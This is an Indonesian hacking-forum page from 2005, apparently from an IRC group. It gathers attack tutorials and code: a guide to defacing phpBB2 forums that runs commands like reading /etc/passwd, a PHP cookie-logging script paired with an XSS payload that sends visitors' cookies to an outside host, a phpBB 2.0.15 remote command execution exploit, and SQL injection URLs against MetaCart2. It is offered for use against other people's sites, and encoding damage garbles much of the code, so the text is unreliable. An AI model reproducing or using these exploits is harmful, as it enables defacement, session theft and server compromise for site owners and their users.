Kumpulan tutorial ini kami persembahkan bagi anda yang pingin belajar Hacking, Defacing, Cracking, dan yang berhubungan dengan dunia Komputer.
Tapi Ingat Kami Tidak Bertanggung Jawab Atas Penyalah Gunaan Artikel Ini.
-ChanServ- Channel: #solohackerlink -ChanServ- Founder: PeNcOpEt_CiNtA, last seen: 5 days (0h 40m 1s) ago -ChanServ- Successor: POM PONK << ONLINE >> _ -ChanServ- Registered: 2 years 24 weeks 2 days (1h 31m 55s) ago (2003) -ChanServ- Last Used: 0 seconds ago -ChanServ- Topic: [ www.solohackerlink.cool.to Kirimkan tutorial k-mu disini ] Selamat Menunaikan Ibadah Syaum -ChanServ- Email: solohackerlink@gmail.com -ChanServ- Url: www.solohackerlink.s.to -ChanServ- Options: TopicLock, SecureOps, Private, SplitOps, Verbose -ChanServ- Mode Lock: -i
Hack Forum Phpbb2 pakai Tool PhpBB_defacer 
Kali ini babahe mau jelasin cara hack pakai tool PhpBB_defacer. Langkah pertama siapkan www.google.com,cari kata forum phpbb2. misalkan kita ambil contoh kek ini:http://www.target.com/forum/viewtopic.php?t=XXX
Setelah kita dapet targetna kita download tool yg akan kita gunakan untuk mendeface target diatas. nih alamat web toolna "http://www.indianz.ch/tools/sploits/phpbb_defacer.zip"
download sampi komplit setelah itu simph di komputer kamu. dan jangan lupa di install sekalian.
kalo dah terinstall buka aja tool tersebut dan masukkan alamat web target.
"url:http://www.target.com/forum/viewtopic.php?t=XXX "Command: (ls -al) (masukkan command unix) (id) (cat /etc/passwd) (find httpd.conf in server) (pwd)
setelah itu klik icon "RUN" dan tunggu beberapa saat, kalo ada tulisan kek begini "SORRY NOT VUNLIBITY" coba klik RUN sekali lagi,dan klo tidak bisa lagi cari target yang lain.
Nah supaya tahu kalo target tersebut dapat dieksekusi dengan tool PhpBB_defacer akan muncul tulisan "USER NAME" (isi dengan nick kamu) Your Text ketik Hacked oleh:(SOLOHACKERLINK by: nick kamu) kemudian klik tulisan Deface dan klik Add kalo ada tulisan SUCCESS berarti kamu berhasil.
Selamat mencoba
Referensi: www.asyiyane.com
Post by :POM_PONK on [ 21 November 2005 15:06:32 ]
####################################################################### # # Indonesian Newbie Class ( Resource Code ) # proxy grabber # By iDiots http://idiots.madpage.com # # idiots@linuxmail.org # ####################################################################### # phpbb.2.0.16.xss+cookies.iDiots ####################################################################### # # Thank¢¥s For all My Friend at #NeRaka #kartubeben #solohackerlink # Pa n ma, My brother n siterzzzz # Keluarga besar, My DD Jelex/Tari, Aini, teteh Tika n papa n mama (Terimakasih dah mau ngangkat gw anak..) # ####################################################################### 
<?php $cookie = $_GET[¢¥c¢¥]; $ip = getenv (¢¥REMOTE_ADDR¢¥); $date=date("j F, Y, g:i a"); TTP $referer=getenv (¢¥H _REFERER¢¥); $fp = fopen(¢¥iDiots.php¢¥, ¢¥a¢¥); fwrite($fp, ¢¥<br>Cookie: ¢¥.$cookie.¢¥</br> IP: ¢¥ .$ip. ¢¥<br> Date and Time: ¢¥ .$date. ¢ ¥</br> Referer: ¢¥.$referer.¢¥ ¢¥); fclose($fp); ?>  
//Potong ajah... //kasi nama cookies.php and buat file baru iDiots.php dan chmod 777 //
// // exploit nya
[color=#EFEFEF]www.ut[url=www.s=¢¥¢¥style=¢¥font-size:0;color:#EFEFEF¢¥style=¢ ¥top:expression(eval(this.sss));¢¥sss=`i=new/**/Image 
();i.src=¢¥http://mysite/cookies.php?c=¢¥+document.cookie;this.sss=null`style=¢¥font-size:0;][/url] ¢¥[/color]
 --------------------------------iDiots From Hell http://idiots.Madpage.com 
idiots@linuxmail.org -------------------------------- 
Post by :iDiots on [ 19 November 2005 17:00:28 ]
phpbb2root (version 2.0.15) 
####################################################################### # # Indonesian Newbie Class ( Resource Code ) # proxy grabber # By iDiots http://idiots.madpage.com # # idiots@linuxmail.org # ####################################################################### # phpbb2root (version 2.0.15) ####################################################################### # # Thank¢¥s For all My Friend at #NeRaka #kartubeben #solohackerlink # Pa n ma, My brother n siterzzzz # Keluarga besar, My DD Jelex/Tari, Aini, teteh Tika n papa n mama (Terimakasih dah mau ngangkat gw anak..) # ####################################################################### 
//phpbb2root by iDiots (version 2.0.15) //remote shell commands execution... //Indonesian Newbie Class Resource Code
error_reporting(0); echo ¢¥<head><title>php2bbroot for version 2.0.15</title> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <style type="text/css"> <!-- body,td,th {color: #00FF00;} body {background-color: #000000;} .Stile5 {font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 10px; } .Stile6 {font-family: Verdana, Arial, Helvetica, sans-serif;  font-weight: bold;
font-style: italic; } -->  </style></head> <body> <p class="Stile6">phpbb 2.0.15 root </p> <p class="Stile6">a script by rgod at <a href="http://rgod.altervista.org" target="_blank">http://rgod.altervista.org</a></p> <table width="84%" > <tr > <td width="43%"> <form name="form1" method="post" action="¢¥.$PHP_SELF.¢ ¥?mypath=value&topic=value&command=value&host=value"> <p>  <input type="text" name="host"> <span class="Stile5">hostname (ex: www.sitename.com) </span></p> <p> <input type="text" name="mypath"> <span class="Stile5">path (ex: /phpbb2/ or just /) </span></p> <p> <input type="text" name="topic"> <span class="Stile5">existing topic number (a number) </span> </p> p < > <input type="text" name="command"> <span class="Stile5">unix command (ex. ls -la to list directories or cat config.php to grab database passwords, then see html)) </span> </p> <p> <input type="submit" name="Submit" value="go!"> </p > </form></td> </tr> </table> </body>  </html>¢¥;
function show($headeri) { $ii=0; $ji=0;
$ki=0; $ci=0; echo ¢¥<table border="0"><tr>¢¥; while ($ii <= strlen($headeri)-1) { $datai=dechex(ord($headeri[$ii])); if ($ji==16) { $ji=0; $ci++; echo "<td /td>"; > < for ($li=0; $li<=15; $li++) { echo "<td>".$headeri[$li+$ki]."</td>"; } $ki=$ki+16; echo "</tr><tr>"; } if (strlen($datai)==1) {echo "<td>0".$datai."</td>";} else " {echo "<td> .$datai."</td> ";} $ii++; $ji++; } for ($li=1; $li<=(16 - (strlen($headeri) % 16)+1); $li++) { echo "<td> </td>"; }
for ($li=$ci*16; $li<=strlen($headeri); $li++) { echo "<td>".$headeri[$li]."</td>"; }
echo "</tr></table>";
if (($mypath<>¢¥¢¥) and ($topic<>¢¥¢¥) and ($command<>¢¥¢¥) and ($host<>¢¥¢¥)) { $path $mypath; = $path .= ¢¥viewtopic.php?t=¢¥; $path .= $topic; $path .= ¢¥&command=¢¥;
$path .= urlencode($command); $path .= "&highlight=¢¥.system(%24HTTP_GET_VARS[command]).¢¥"; echo urldecode($path).¢¥<br>¢¥; $mypacket ="GET ".$path." HTTP/1.1 "; $mypacket.="Accept: text/html; "; $mypacket.="Accept-Encoding: text/plain "; $mypacket.="Host: ".$host." "; $mypacket.="Connection: Close "; $fp=fsockopen(gethostbyname($host),80); fputs($fp,$mypacket); show($mypacket); echo ¢¥<br>¢¥; $result=""; while (!feof($fp)) { $result .= fgets($fp); }
//show($result); //lihat output di packet dump mode, untuk menghindari XSS menjawab dari target echo $result; fclose($fp); }
 --------------------------------iDiots From Hell http://idiots.Madpage.com 
idiots@linuxmail.org  --------------------------------
Post by :iDiots on [ 19 November 2005 16:57:37 ]
MetaCart2 for PayFlow Multiple Sql Injection Vulnerabilities 
####################################################################### # # Indonesian Newbie Class ( Papers ) # proxy grabber # By iDiots http://idiots.madpage.com # # idiots@linuxmail.org # ####################################################################### # MetaCart2 for PayFlow Multiple Sql Injection Vulnerabilities ####################################################################### # # Thank¢¥s For all My Friend at #NeRaka #kartubeben #solohackerlink # Pa n ma, My brother n siterzzzz # Keluarga besar, My DD Jelex/Tari, Aini, teteh Tika n papa n mama (Terimakasih dah mau ngangkat gw anak..) # ####################################################################### 
---------- scriptzzz ---------------------------- ---------------------------------
Vendor: MetaCart Vendor Website: http://metalinks.com Summary: There are, multiple sql injection vulnerabilities in metacart2 for payflow.
Proof of Concept Exploits:
http://example.com/mcart2pfp/productsByCategory.asp?intCatalogID=¢¥SQL INJECTION&% _ 3bstrCatalog_NAME=Computers SQL INJECTION
http://example.com/mcart2pfp/productsByCategory.asp?strSubCatalogID=¢ ¥SQL_INJECTION&%3bcurCatalogID=10001&%3bstrSubCatalog_NAM 
http://example.com/mcart2pfp/productsByCategory.asp?strSubCatalogID=1&%3bcurCatalogID=¢ ¥SQL INJECTION&%3 atalo AME=La _ bstrSubC g_N
http://example.com/mcart2pfp/productsByCategory.asp?strSubCatalogID=1&% 3bcurCatalogID=10001&%3bstrSubCatalog_NAME=¢¥SQL_INJECT 
http://example.com/mcart2pfp/product.asp?intProdID=¢¥SQL_INJECTION SQL INJECTION
http://example.com/mcart2pfp/productsByCategory.asp?intCatalogID=¢¥SQL INJECTION&% _ 3bpage=2 SQL INJECTION
 --------------------------------iDiots From Hell
idiots@linuxmail.org ----------------------------- 
Post by :iDiots on [ 19 November 2005 16:56:04 ]
ASP Shell 
#!/usr/bin/python ####################################################################### # # Indonesian Newbie Class ( Resource Code ) # proxy grabber # By iDiots http://idiots.madpage.com # # idiots@linuxmail.org # ####################################################################### # ASP Shell ( Dodols ) ####################################################################### # # Thank¢¥s For all My Friend at #NeRaka #kartubeben #solohackerlink # Pa n ma, My brother n siterzzzz # Keluarga besar, My DD Jelex/Tari, Aini, teteh Tika n papa n mama (Terimakasih dah mau ngangkat gw anak..) # ####################################################################### 
------------------------- -- scriptzzz --------------------------------------------
